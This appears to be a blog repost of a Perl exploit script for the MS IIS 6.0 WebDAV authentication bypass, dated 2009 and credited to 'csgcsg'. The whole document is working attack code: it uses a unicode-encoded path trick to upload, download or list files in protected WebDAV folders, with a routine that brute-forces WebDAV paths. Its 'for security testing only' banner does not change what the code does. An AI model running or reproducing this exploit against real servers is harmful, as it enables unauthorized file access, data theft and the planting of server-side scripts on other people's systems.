#!/usr/bin/perl # ********* !!! WARNING !!! ********* # * FOR SECURITY TESTiNG ONLY! * # *********************************** # MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 # v1.1 add brute force dir fuction. 2009-05-29 # v1.0 download?upload and list dir. 2009-05-24 # # Usage: # IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file] # -target eg.: 192.168.1.1 # -port eg.: 80 # -method eg.: g # (p:PUT,g:GET,l:LIST) # -webdavpath eg.: webdav # -BruteForcePath eg.: brute force webdav path # -file (optional) eg.: test.aspx # Example: # put a file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx # get a file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx # list dir: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav # brute force + list dir: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt # brute force + get file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx use IO::Socket; use Getopt::Long; use threads; use threads::shared; # Globals Go Here. my $target; # Host being probed. my $port; # Webserver port. my $method; # HTTP Method, PUT GET or . my $xpath; # WebDAV path on Webserver. my $bpath; # Bruteforce WebDAV path. my $file; # file name. my $httpmethod; my $Host_Header; # The Host header has to be changed GetOptions( "target=s" => $target, "port=i" => $port, "method=s" => $method, "xpath=s" => $xpath, "bpath=s" => $bpath, "file=s" => $file, "help|?" => sub { hello(); exit(0); } ); $error .= "Error: You must specify a target hostn" if ((!$target)); $error .= "Error: You must specify a target portn" if ((!$port)); $error .= "Error: You must specify a put,get or list methodn" if ((!$method)); $error .= "Error: You must specify a webdav pathn" if ((!$xpath) && (!$bpath)); $error .= "Error: You must specify a upload or download file namen" if ((!$file) && $method != "l"); if ($error) { print "Try $0 -help or -?' for more information.n$errorn" ; exit; } hello(); if ($method eq "p") { $httpmethod = "PUT"; } elsif ($method eq "g") { $httpmethod = "GET"; } elsif ($method eq "l") { $httpmethod = "PROPFIND"; } else { print "$method Method not accept !!!n"; exit(0); } # ************************************ # * We testing WebDAV methods first * # ************************************ webdavtest($target,$port); #end of WebDAV testing. # **************************************** # * We try to brute forceing WebDAV path * # **************************************** if ($bpath) { $xpath = webdavbf($target,$port,$bpath); } #end of brute force print "-" x 60 ."n"; if ($httpmethod eq "PUT") { my $content; my $data; #cacl file size $filesize = -s $file; print "$file size is $filesize bytesn"; open(INFO, $file) || die("Could not open file!"); #@lines=<INFO>; binmode(INFO); #binary while(read(INFO, $data, $filesize)) { $content .= $data; } close(INFO); #print $content; $Host_Header = "Translate: frnHost: $targetrnContent-Length: $filesizern"; } elsif ($httpmethod eq "GET") { $Host_Header = "Translate: frnHost: $targetrnConnection: closernrn"; } elsif ($httpmethod eq "PROPFIND") { $Host_Header = "Host: $targetrnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn"; $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; } print "-" x 60 ."n$httpmethod $file , Please wait ...n"."-" x 60 ."n"; # ************************ # * Sending HTTP request * # ************************ if ($httpmethod eq "PUT") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Headerrn$content",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $portn";} } elsif ($httpmethod eq "GET") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Header",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $portn";} } elsif ($httpmethod eq "PROPFIND") { @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0rn$Host_Header",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $portn";} } #print @results; $flag="off"; if ($results[0] =~ m|^HTTP/1.[01] 2[0-9][0-9] |){ $flag="on"; } elsif ($results[0] =~ m|^HTTP/1.[01] 4[0-9][0-9] |){ $flag="off"; } print "-" x 60 ."n"; if ($flag eq "on") { if ($httpmethod eq "PUT") { print "$httpmethod $file from [$target:$port/$xpath] OKrn"; } elsif ($httpmethod eq "GET") { my $line_no = 0; my $counter = @results; foreach $line (@results){ ++$line_no; if ($line =~ /^Accept-Ranges: bytesrn/){ last; } } # Write file to disk open(OUTFILE, ">$file") or die "Could not write to file: $!n"; binmode (OUTFILE); print OUTFILE @results[$line_no+1..$counter]; close(OUTFILE); print "$httpmethod $file from [$target:$port/$xpath] OKrnPlease check $file on local diskrn"; } elsif ($httpmethod eq "PROPFIND") { print "$httpmethod path list from [$target:$port/$xpath] OKrn"; foreach $line (@results){ if ($line =~ /^<?xml version=/i){ my @list = split("<a:href>", $line); foreach $path (@list) { $no = index($path,"<"); $result.=substr($path, 0, $no)."n"; } print $result; last; } } } } else { print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!rn"; } print "-" x 60 ."n"; exit(0); # ************* # * Sendraw-2 * # ************* sub sendraw2 { my ($pstr,$realip,$realport,$timeout)=@_; my $target2 = inet_aton($realip); my $flagexit=0; $SIG{ALRM}=&ermm; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems"); alarm($timeout); if (connect(S,pack "SnA4x8",2,$realport,$target2)){ alarm(0); my @in; select(S); $|=1; print $pstr; alarm($timeout); while(<S>){ if ($flagexit == 1){ close (S); print STDOUT "Timeoutn"; return "Timeout"; } push @in, $_; } alarm(0); select(STDOUT); close(S); return @in; } else {return "0";} } sub ermm{ $flagexit=1; close (S); } sub webdavtest { my ($testip,$testport)=@_; print "-" x 60 ."n"; print "Testing WebDAV methods [$testip $testport]n"; print "-" x 60 ."n"; @results=sendraw2("OPTIONS / HTTP/1.0rnrn",$testip,$testport,10); if ($#results < 1){die "10s timeout to $target on port $testportn";} #print @results; $flag="off"; foreach $line (@results){ if ($line =~ /^Server: /){ ($left,$right)=split(/:/,$line); $right =~ s/ //g; print "$target : Server type is : $right"; if ($right !~ /Microsoft-IIS/i){ print "$target : Not a Microsoft IIS Servern"; exit(0); } } if ($line =~ /^DAV: /){ $flag="on"; } if ($line =~ /^Public: / && $flag eq "on"){ ($left,$right)=split(/:/,$line); $right =~ s/ //g; print "$target : Method type is : $right"; if ($right !~ /$httpmethod/i){ print "$target : Not allow $httpmethod on this WebDAV Servern"; exit(0); } else { $flag="on"; } } } if ($flag eq "off") { print "$target : WebDAV disablen"; exit(0); } } sub webdavbf { my ($bfip,$bfport,$bfpath)=@_; print "-" x 60 ."n"; print "Try to brute forceing WebDAV path ...n"; print "-" x 60 ."n"; open(BF, $bfpath) || die("Could not open file!"); foreach $lines (<BF>){ chomp($lines); $Host_Header = "Host: $bfiprnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn"; $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; @results=sendraw2("PROPFIND /$lines/ HTTP/1.0rn$Host_Header",$bfip,$bfport,10); if ($#results < 1){die "10s timeout to $bfip on port $bfportn";} print "[$lines]...$results[0]"; #maybe this response #HTTP/1.1 207 Multi-Status if ($results[0] =~ m|^HTTP/1.[01] 401 |){ print "Find out path on [$lines]n"; return $lines; last; } } close(BF) ; print "Sorry... We can not find any more path... :(n"; exit(0); } sub hello{ print "n"; print "t ###################################################n"; print "t # MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0 #n"; print "t # **************** !!! WARNING !!! **************#n"; print "t # **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#n"; print "t # ***********************************************#n"; print "t # Written by csgcsg 2009-05-29 #n"; print "t ###################################################n"; print "nt $0 -target -port -method -webdavpath [-file]n"; print "nt -targetttt eg.: 192.168.1.1n"; print "t -porttttt eg.: 80n"; print "t -methodttt eg.: gn"; print "t (p:PUT, g:GET, l:LIST)n"; print "t -webdavpath|-bruteForcePatht eg.: webdavn"; print "t -filetttt eg.: test.aspxnn"; print "t Usage eg.: nt $0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspxn"; };
©2011, copyright BLACK BURN
0 comments:
Post a Comment